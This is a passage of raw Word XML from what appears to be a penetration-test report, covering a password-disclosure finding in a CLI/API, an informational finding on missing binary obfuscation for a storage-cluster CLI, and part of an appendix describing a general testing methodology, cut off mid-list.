              <w:t>Vulnerabilities that result in the disclosure of users passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the CLI/API itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB00AB" w14:paraId="108CD7D5" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E89A22E" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211F8A51" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">There is generally no valid reason for a CLI or API to return user passwords in its responses. If user impersonation is a business requirement, it should be implemented through a custom function with proper access controls and logging. Credentials must be redacted from all </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>responses.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520A0377" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6533D55A" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Reference: https://cwe.mitre.org/data/definitions/204.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46DE14CB" w14:textId="2BC4A7F0" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId79" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195164">
        <w:bookmarkStart w:id="52" w:name="_Toc200562855"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>195164: No Binary Obfuscation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>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top w:w="80" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="80" w:type="dxa"/>
          <w:right w:w="50" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9410"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="2D71CAD0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50D07E58" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36CC460C" w14:textId="573E4DF0" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="00313E72">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Due to lack of Binary Protection/Obfuscation, application can be decompiled to gain knowledge about the programming technique, the interface and class definitions used, the open source algorithms and functions used etc. In this finding, all the details that can be obtained by decompiling the current application being tested.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C9312C" w14:textId="77777777" w:rsidR="005E715D" w:rsidRDefault="005E715D" w:rsidP="00313E72">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="55A81D1D" w14:textId="5D48385B" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FD13E8" wp14:editId="33E3CA30">
                  <wp:extent cx="5928803" cy="2218414"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="24" name="Drawing 24" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 24" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId80"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5986601" cy="2240040"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="2B516E3F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="017E48E9" w14:textId="318C2670" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Affected </w:t>
            </w:r>
            <w:r w:rsidR="009D1226">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CLI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>/API(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64BFC0B9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="4FD43DC9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DFF418C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74828FD1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Binary inspection gives the attacker insight into the inner workings of the application. This may be used to exploit other nascent vulnerabilities in the application, as well as revealing information about back end servers, business logic, cryptographic constants and ciphers, and intellectual property. This might aid in further attacks using dynamic instrumentation and reverse engineering.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="548D6B3E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C532169" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C35875F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Obfuscate application source code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C971343" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7ACAE3AD" w14:textId="6894859D" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference: </w:t>
            </w:r>
            <w:hyperlink r:id="rId81" w:history="1">
              <w:r w:rsidR="002D14F5" w:rsidRPr="00E066AA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                  <w:color w:val="0532FE"/>
                </w:rPr>
                <w:t>https://www.appsealing.com/code-obfuscation/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50580C0E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD34974" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc200562856"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix A - Detailed Testing Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="30B5D536" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="500"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>PTC penetration testing methodology is based on a structured approach applying industry best practices in testing. The below mentioned areas require different approaches and techniques and an overview of the general methodology is provided.</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402"/>
        <w:gridCol w:w="7968"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="30D241DB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="4AC14BF0" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC"/>
          <w:p w14:paraId="748B0F6D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="15DBAF41" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC"/>
          <w:p w14:paraId="27DEFE65" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Methodology Overview</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="2E19C569" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D354E3F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Web Application / API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="510778A3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC"/>
          <w:p w14:paraId="26ABF66F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="124"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PTC follows a customized pen test strategy based on OWASP Application Security Verification Standard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">►   Information Gathering </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Gather scope via questionnaire, application demo by product team, review of threat Model, source scan and open source scan reports, CVE info etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">►    Reconnaissance </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Fingerprinting server using banner grabbing techniques, HTTP request/response, analysis of cookies, HTML source code etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>►    Scanning and vulnerability assessment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Automated scans using Burp Suite, OWASP ZAP etc., false positive analysis, identifying attack surface</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>►  Manual testing and exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Extensive manual tests are performed in the following areas with additional focus on newly found vulnerabilities in the market</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     •    Authentication, Authorization and Session Management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     •   Input Validation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     •   Error Handling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     •   Security configuration  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     •   Client-side tests</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">     •   Business Logic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>►    Reporting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Easy to consume executive summary and detailed findings report prepared by documenting the findings based on CVSS scoring along with risk assessment and fix recommendation, including steps that can be taken to mitigate each </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="486D47C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DB712C1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63574623" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC"/>
          <w:p w14:paraId="262A8642" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="124"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PTC follows a customized pen test strategy based on PTES and PCI Penetration Testing Guide</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve"> ►    Information Gathering </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Gather scope of the target network and its infrastructure, IP ranges,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>network topology, and active hosts, systems and devices to be tested</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">►  Reconnaissance </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Passive: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>ExploitDB</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> / NVD search, DNS Fingerprinting etc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Active:  Banner grabbing using services such as FTP, Telnet, HTTP etc. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                             Firewall / IDS / IPS detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>► Scanning and enumeration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Automated scans using tools such as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">, Nessus etc., to identify open </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>ports, misconfigured services/OS fingerprinting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Vulnerability assessments using Nmap scripts / Nessus plugins </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>►  Manual testing and exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Conduct manual testing to identify vulnerabilities that automated scanners</w:t>
            </w:r>
            <w:r>
              <w:rPr>
